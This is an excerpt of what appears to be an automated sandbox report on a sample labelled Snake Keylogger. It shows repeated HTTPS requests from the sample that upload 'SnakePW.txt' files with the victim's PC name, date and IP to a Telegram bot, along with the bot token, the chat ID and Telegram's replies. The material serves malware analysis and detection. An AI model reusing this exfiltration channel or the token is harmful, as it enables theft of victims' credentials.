                                                                    2022-06-26 07:34:28 UTC432OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 36 31 66 66 33 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757161ff376Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:29 UTC433INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:29 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:29 UTC433INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67039,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228869,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    257192.168.2.550169149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:29 UTC434OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757166515a2
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:29 UTC434OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 36 36 35 31 35 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757166515a2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:29 UTC434INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:29 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:29 UTC435INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67041,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228869,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    258192.168.2.550170149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:29 UTC435OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575716bfaf36
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:29 UTC436OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 36 62 66 61 66 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575716bfaf36Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:30 UTC436INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:30 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:30 UTC436INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67042,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228870,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    259192.168.2.550171149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:30 UTC437OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575716f42491
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:30 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 36 66 34 32 34 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575716f42491Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:30 UTC438INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:30 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:30 UTC438INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67043,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228870,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    26192.168.2.549794149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:49 UTC43OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756daa3ba90
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:49 UTC44OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 61 61 33 62 61 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756daa3ba90Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:49 UTC44INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:49 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:49 UTC45INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66773,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228769,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    260192.168.2.550174149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:30 UTC439OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575717322199
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:30 UTC439OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 37 33 32 32 31 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575717322199Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:31 UTC439INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:31 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:31 UTC440INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67044,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228871,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    261192.168.2.550177149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:31 UTC440OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575717964394
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:31 UTC441OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 37 39 36 34 33 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575717964394Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:31 UTC441INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:31 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:31 UTC441INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67045,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228871,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    262192.168.2.550180149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:31 UTC442OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575717d1de33
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
